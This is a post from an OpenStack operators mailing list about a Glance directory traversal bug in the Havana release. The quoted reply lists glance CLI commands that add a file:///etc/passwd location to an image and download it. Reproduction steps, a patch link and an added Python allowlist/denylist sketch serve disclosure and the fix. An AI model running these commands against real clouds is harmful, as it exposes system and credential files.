[Openstack-operators] glance directory traversal bug and havana
George Shuklin
george.shuklin at gmail.com
Fri Jan 9 17:10:19 UTC 2015
Seems I was wrong.
Thanks, I'll look at it again.
On 01/08/2015 07:37 PM, Jesse Keating wrote:
> On 1/7/15 8:47 PM, George Shuklin wrote:
>> I spent a few hours trying to backport to Havana, but then I found that
>> Havana seems to be immune to the bug. I'm not 100% sure, so someone else
>> is advised to look too.
>>
>> The bug was that icehouse+ accepts all supported schemas. The fix excludes
>> 'bad' schemes. Havana, though, has an explicitly given list of accepted
>> schemes for the location field, and 'bad' schemes are not in it.
>>
>
> Havana is certainly not immune. I was able to fetch content from the
> system fairly easily.
>
> Start with an updated glance client
>
> Modify it as listed in
> https://bugs.launchpad.net/glance/+bug/1400966/comments/6
>
> $ glance image-create --disk-format raw --container-format bare
>
> $ glance image-update --size 700 <image_id>
>
> $ glance --os-image-api-version 2 location-add --url file:///etc/passwd
>
> $ glance image-download <image_id>
>
>
> That got me (some of) the contents of /etc/passwd.
>
> The patch I posted prevented this from happening. It blocks adding a
> location that is file:// based, but still allows other location adds
> that should be allowed.
>
> https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496
>
>
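
The thread contrasts two ways of validating an image location: excluding 'bad' schemes versus keeping an explicit list of accepted ones. The sketch below is an added example, not code from this thread or from Glance; the function names, both scheme sets and the sample URLs are constructed for illustration.

```python
from urllib.parse import urlsplit

# Hypothetical policy values for illustration; not Glance's actual lists.
RESTRICTED_SCHEMES = frozenset({"file"})         # "exclude bad schemes" style
ACCEPTED_SCHEMES = frozenset({"http", "https"})  # "explicit accepted list" style


def location_scheme(url):
    """Return the normalized (lowercase) scheme of a location URL, or ''."""
    return urlsplit(url.strip()).scheme.lower()


def allowed_by_denylist(url, restricted=RESTRICTED_SCHEMES):
    """Accept any URL that has a scheme, unless the scheme is restricted."""
    scheme = location_scheme(url)
    return bool(scheme) and scheme not in restricted


def allowed_by_allowlist(url, accepted=ACCEPTED_SCHEMES):
    """Accept only URLs whose scheme is explicitly listed."""
    return location_scheme(url) in accepted


def audit_locations(urls):
    """Map each URL to (denylist verdict, allowlist verdict)."""
    return {u: (allowed_by_denylist(u), allowed_by_allowlist(u)) for u in urls}


# Constructed sample inputs.
SAMPLE_LOCATIONS = [
    "file:///etc/passwd",
    "FILE:///etc/passwd",
    "https://images.example.org/cirros.img",
    "/var/lib/glance/images/1234",
    "ftp://mirror.example.org/image.raw",
]

if __name__ == "__main__":
    for url, (deny_ok, allow_ok) in audit_locations(SAMPLE_LOCATIONS).items():
        print(f"{url:45} denylist={deny_ok!s:5} allowlist={allow_ok}")
```

Both checks refuse the file:// location, but only the explicit accepted list also refuses a scheme that nobody reviewed, such as the ftp:// sample.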